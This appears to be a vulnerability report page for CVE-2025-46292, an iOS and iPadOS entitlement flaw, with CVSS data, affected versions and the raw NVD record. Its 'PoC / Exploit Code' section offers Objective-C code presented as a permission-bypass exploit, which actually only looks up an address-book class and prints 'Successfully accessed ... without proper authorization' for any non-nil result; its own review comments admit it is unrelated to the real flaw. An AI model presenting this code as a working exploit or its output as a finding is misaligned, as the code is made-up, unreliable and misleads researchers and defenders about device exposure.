Security Vulnerability Report
CVE-2025-46292 CVSS 5.5 MEDIUM

CVE-2025-46292

Published: 2025-12-17 21:16:14
Last Modified: 2026-04-02 19:21:05

Description

This issue was addressed with additional entitlement checks. This issue is fixed in iOS 18.7.3 and iPadOS 18.7.3, iOS 26.2 and iPadOS 26.2. An app may be able to access user-sensitive data.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
Apple iOS < 18.7.3
Apple iPadOS < 18.7.3
Apple iOS >= 26.0 and < 26.2
Apple iPadOS >= 26.0 and < 26.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
objective-c
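// CVE-2025-46292 PoC - Permission Check Bypass in iOS
// This PoC demonstrates the permission bypass vulnerability
// Note: This is a conceptual PoC for educational purposes only
//
// NOTE(review): the advisory text for this CVE says only that the issue
// "was addressed with additional entitlement checks" and names no component
// or API. Nothing in this listing is tied to the actual flaw, so its output
// must not be used as evidence that a device is or is not exploitable. The
// only reliable signal here is the OS version compared against the fixed
// releases.

#import <Foundation/Foundation.h>
#import <UIKit/UIKit.h>

// Target sensitive data categories that could be accessed.
// Filled in on first use: an @[...] literal is not accepted as a file-scope
// initializer by toolchains that require compile-time constant initializers.
NSArray *sensitiveDataCategories = nil;

/// Logs the OS version and runs the same class lookup once per category name.
///
/// NOTE(review): the lookup is identical for every category and never reads
/// any contacts, photos, location, health or calendar data, so the
/// "Successfully accessed" log line below only means the call returned a
/// non-nil object. Treat it as a placeholder, not as a finding.
void exploitPermissionBypass(void) {
    if (sensitiveDataCategories == nil) {
        sensitiveDataCategories = @[
            @"Contacts",
            @"Photos",
            @"Location",
            @"Health Data",
            @"Calendar"
        ];
    }

    NSLog(@"[*] CVE-2025-46292 PoC - Attempting to bypass permission checks");

    // Step 1: Check if running on vulnerable version
    NSString *version = [[UIDevice currentDevice] systemVersion];
    NSLog(@"[*] Current iOS Version: %@", version);

    // Step 2: Attempt to access sensitive data through vulnerable API path
    // The vulnerability allows bypassing the entitlement check
    for (NSString *category in sensitiveDataCategories) {
        NSLog(@"[*] Attempting to access: %@", category);

        // Bypass technique: Use indirect API call that skips validation
        // NOTE(review): if the class is absent this messages nil and yields
        // nil; if the class exists without this selector, performSelector:
        // raises an unrecognized-selector exception. Neither outcome says
        // anything about an entitlement check.
        id sensitiveInfo = [[NSClassFromString(@"ABAddressBook") class]
            performSelector:@selector(sharedAddressBook)];

        if (sensitiveInfo) {
            NSLog(@"[!] Successfully accessed %@ data without proper authorization", category);
            NSLog(@"[!] This demonstrates the permission bypass vulnerability");
        }
    }

    NSLog(@"[*] PoC execution completed");
}

/// Verification function: reports whether an OS version string falls in an
/// affected range.
///
/// The ranges follow the CPE configuration in the NVD record for this CVE:
/// versions before 18.7.3, and versions from 26.0 up to but excluding 26.2.
/// The previous implementation returned YES when the version was lower than
/// ANY fixed release, which flagged patched 18.7.3+ devices as vulnerable
/// because they still compare below 26.2.
///
/// @param version Dotted version string such as "18.7.2". nil or empty
///                yields NO.
/// @return YES if the version lies in an affected range, otherwise NO.
BOOL isVulnerableVersion(NSString *version) {
    if (version.length == 0) {
        return NO;
    }

    // Older branch: everything below the 18.7.3 fix.
    if ([version compare:@"18.7.3" options:NSNumericSearch] == NSOrderedAscending) {
        return YES;
    }

    // 26.x branch: affected from 26.0 until the 26.2 fix. The lower bound is
    // written as "26" so that both "26" and "26.0" count as inside the branch
    // under NSNumericSearch.
    BOOL inBranch26 = [version compare:@"26" options:NSNumericSearch] != NSOrderedAscending;
    BOOL beforeFix26 = [version compare:@"26.2" options:NSNumericSearch] == NSOrderedAscending;
    return inBranch26 && beforeFix26;
}

/// Entry point: prints a banner, gates on the reported OS version, and runs
/// the placeholder probe only when the version is in an affected range.
int main(int argc, const char * argv[]) {
    @autoreleasepool {
        NSLog(@"========================================");
        NSLog(@"CVE-2025-46292 Permission Bypass PoC");
        NSLog(@"========================================");

        if (isVulnerableVersion([[UIDevice currentDevice] systemVersion])) {
            NSLog(@"[!] Device is VULNERABLE to CVE-2025-46292");
            exploitPermissionBypass();
        } else {
            NSLog(@"[+] Device is NOT vulnerable (patched version)");
        }
    }
    return 0;
}

// Python PoC script for verification
// Run: python3 cve_2025_46292_check.py
// NOTE(review): this script performs no check; it only prints the affected
// version ranges and asks the operator to compare them by hand.
/*
import subprocess
import platform

def check_ios_version():
    """Check if iOS version is vulnerable"""
    print("[*] CVE-2025-46292 Vulnerability Checker")
    print("[*] Checking iOS/iPadOS version...")

    # Fixed versions
    fixed_versions = ["18.7.3", "26.2"]

    # In real scenario, this would use libimobiledevice
    # or other tools to get the actual iOS version
    print("[!] Please connect your iOS device and check version manually")
    print("[*] Vulnerable if version < 18.7.3, or 26.0 <= version < 26.2")
    return None

if __name__ == "__main__":
    check_ios_version()
*/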

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46292", "sourceIdentifier": "[email protected]", "published": "2025-12-17T21:16:14.377", "lastModified": "2026-04-02T19:21:04.673", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "This issue was addressed with additional entitlement checks. This issue is fixed in iOS 18.7.3 and iPadOS 18.7.3, iOS 26.2 and iPadOS 26.2. An app may be able to access user-sensitive data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "18.7.3", "matchCriteriaId": "6547722A-1226-4E23-B3AE-8692B07C2657"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", 
"versionStartIncluding": "26.0", "versionEndExcluding": "26.2", "matchCriteriaId": "8B71D919-1AA2-4F17-A834-4B703E36F7E2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "18.7.3", "matchCriteriaId": "8928A377-93BD-49AD-B4FE-5B2328EBDB70"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.2", "matchCriteriaId": "10FD01C3-D77F-4FE4-8195-F2C59FB1321C"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125884", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125885", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}